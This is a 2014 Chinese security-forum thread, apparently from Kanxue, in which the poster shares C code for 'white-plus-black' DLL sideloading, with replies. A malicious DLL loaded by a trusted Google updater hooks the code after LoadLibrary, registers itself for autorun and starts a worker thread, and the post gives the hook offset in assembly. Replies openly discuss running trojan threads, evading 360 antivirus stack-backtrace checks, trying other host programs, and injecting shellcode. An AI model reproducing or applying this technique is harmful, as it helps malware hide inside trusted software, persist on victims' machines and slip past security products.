首页
社区
课程
招聘
[原创]闲得无聊,发个白加黑利用代码
发表于: 2014-12-1 17:40 25034

[原创]闲得无聊,发个白加黑利用代码

2014-12-1 17:40
25034

void MyDevice()
{
	//MessageBox(0,_T("1111"),_T("1111"),MB_OK);
	HANDLE hEv=CreateEvent(NULL,true,false,_T(EVENT_NAME));
	if(hEv!=NULL)
	{
		SetEvent(hEv);
		CloseHandle(hEv);
	}
	TCHAR szCurrentModleName[MAX_PATH];
	GetModuleFileName(0,szCurrentModleName,MAX_PATH);
	SetSelfAutoRun(szCurrentModleName);
	HANDLE hThread =(HANDLE) _beginthreadex(NULL,NULL,MyThreadProc,NULL,NULL,NULL);
	while(TRUE)
	{
		Sleep(1000);
	}
}
void JmpFunc()
{
	DWORD dwHookCodeAddr = (DWORD)GetModuleHandle(NULL)+0x100B;
	HookAddrCall(dwHookCodeAddr,(DWORD)MyDevice);
}
BOOL WINAPI DllMain(
	HINSTANCE hinstDLL,  // handle to the DLL module
	DWORD fdwReason,     // reason for calling function
	LPVOID lpvReserved   // reserved
	)
{
	switch(fdwReason)
	{
	case DLL_PROCESS_ATTACH:
		hModule=(HMODULE)hinstDLL;
		JmpFunc();
		break;
	case DLL_THREAD_ATTACH:
		break;
	case DLL_THREAD_DETACH:
		break;
	case DLL_PROCESS_DETACH:
		break;
	}

	return true;
}



HOOK 点:

00211000  /$  68 ACF82100   PUSH GoogleWa.0021F8AC                   ; /FileName = "chrome_frame_helper.dll"
00211005  |.  FF15 30D02100 CALL DWORD PTR DS:[<&KERNEL32.LoadLibrar>; \LoadLibraryW
0021100B  |.  8906          MOV DWORD PTR DS:[ESI],EAX
0021100D  |.  85C0          TEST EAX,EAX
0021100F  |.  74 1F         JE SHORT GoogleWa.00211030

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (37)
雪    币: 144
活跃值: (335)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
黑dll中hook白exe的LoadLibrary之后的代码去写启动然后创建木马工作线程么,为什么这样360就不拦了呢
2014-12-1 18:19
0
雪    币: 11
活跃值: (40)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
过栈回溯
其实还有别的玩法
2014-12-1 19:02
0
雪    币: 144
活跃值: (335)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
哦哦,这样啊,360检测的是写启动的函数的栈桢吗?
那么是不是也可以像过游戏的call一样构造个假栈桢呢?
2014-12-1 19:11
0
雪    币: 3366
活跃值: (1363)
能力值: ( LV4,RANK:40 )
在线值:
发帖
回帖
粉丝
5
SetSelfAutoRun()是什么东东?
2014-12-1 20:43
0
雪    币: 144
活跃值: (335)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
这种方法是不是不通用啊?
我用那个暴风的dll劫持的exe
.text:0040117A                 push    offset s->__Stormplayer_dll ; "..\\StormPlayer.dll"
.text:0040117F                 lea     edx, [ebp+LibFileName]
.text:00401185                 push    edx             ; pszPath
.text:00401186                 call    ds:PathAppendW
.text:00401186
.text:0040118C                 call    ds:GetTickCount
.text:0040118C
.text:00401192                 push    8               ; dwFlags
.text:00401194                 mov     ebx, eax
.text:00401196                 push    0               ; hFile
.text:00401198                 lea     eax, [ebp+LibFileName]
.text:0040119E                 push    eax             ; lpLibFileName
.text:0040119F                 call    ds:LoadLibraryExW
.text:0040119F
.text:004011A5                 mov     esi, eax //hook的这一句

然后在hookfunc中写启动还是被拦截了,dll是没被杀的

换个其他的程序就可以了,谢谢楼主分享
2014-12-2 09:50
0
雪    币: 55
活跃值: (75)
能力值: ( LV5,RANK:70 )
在线值:
发帖
回帖
粉丝
7
shellcode运行。而且是在dllmain函数中,不好! 更好的方式是在导出函数中执行JmpFunc 。而且是白的主动调用执行的|
2014-12-2 09:59
0
雪    币: 1234
活跃值: (302)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8
不错的方法,学习了
2014-12-2 13:49
0
雪    币: 11
活跃值: (40)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
9
是的,这种更好
2014-12-2 19:03
0
雪    币: 144
活跃值: (335)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
10
为什么我觉得没区别 。- -,dllmain中只是hook,代码的执行调用来源都一样啊
call hookfunc跟call dll的导出函数有区别吗
2014-12-2 19:13
0
雪    币: 719
活跃值: (777)
能力值: ( LV8,RANK:120 )
在线值:
发帖
回帖
粉丝
11
请问你说的是EATHOOK 吗?
2014-12-2 19:16
0
雪    币: 110
活跃值: (527)
能力值: ( LV4,RANK:40 )
在线值:
发帖
回帖
粉丝
12
你说的是QQ管家吗?
2014-12-9 10:02
0
雪    币: 212
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
13
请问楼主 这个东东 ring3下能玩不
2014-12-9 10:15
0
雪    币: 110
活跃值: (527)
能力值: ( LV4,RANK:40 )
在线值:
发帖
回帖
粉丝
14
这就是r3下的东东。
2014-12-9 10:22
0
雪    币: 110
活跃值: (527)
能力值: ( LV4,RANK:40 )
在线值:
发帖
回帖
粉丝
15
这本来就是白的主动调用执行。。只是代码在dll里面而已。
2014-12-9 10:23
0
雪    币: 719
活跃值: (777)
能力值: ( LV8,RANK:120 )
在线值:
发帖
回帖
粉丝
16
我理解错了看来。。我自己构建了一个shellcode然后写入到加载后的代码最后 Eip回去执行,。。特么的。。累死我了这几天。。。这样代码到是跑到宿主进程去了。。但是显而易见的蛋疼菊紧。。。
2014-12-9 22:52
0
雪    币: 719
活跃值: (777)
能力值: ( LV8,RANK:120 )
在线值:
发帖
回帖
粉丝
17
我看着帖子看着帖子就看错了。。
然后就错了几天。。。。

我把代码写成shellcode然后写入程序最后修改eip执行。。。

累死我了擦。。。
2014-12-9 22:55
0
雪    币: 10072
活跃值: (3008)
能力值: ( LV15,RANK:515 )
在线值:
发帖
回帖
粉丝
18
兄台,表示没看懂,可否讲解一下,黑dll是如何被加载的?
2014-12-15 11:03
0
雪    币: 71
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
19
感谢分享

谢谢
2014-12-15 12:04
0
雪    币: 719
活跃值: (777)
能力值: ( LV8,RANK:120 )
在线值:
发帖
回帖
粉丝
20
LoadLibrary大洞法。如果你有绕过父进程的方法也麻烦回复一下。
2014-12-15 12:07
0
雪    币: 5
活跃值: (108)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
21
我想知道这个和1楼的代码有什么区别吗?

代码注入到白名单的程序不会被拦截什么远程注入什么的吗?

难道是在白名单程序没有启动的情况下将SHELLCODE写到程序里面去?
2014-12-15 14:57
0
雪    币: 10072
活跃值: (3008)
能力值: ( LV15,RANK:515 )
在线值:
发帖
回帖
粉丝
22
可否留个qq,聊聊
2014-12-16 14:43
0
雪    币: 719
活跃值: (777)
能力值: ( LV8,RANK:120 )
在线值:
发帖
回帖
粉丝
23
QQ1595239682
2014-12-16 18:56
0
雪    币: 8
活跃值: (36)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
24
这个学习一下。。
2015-1-6 20:23
0
雪    币: 115
活跃值: (23)
能力值: (RANK:20 )
在线值:
发帖
回帖
粉丝
25
这个很有研究的价值!!!!
2015-7-20 17:28
0
游客
登录 | 注册 方可回帖
返回
//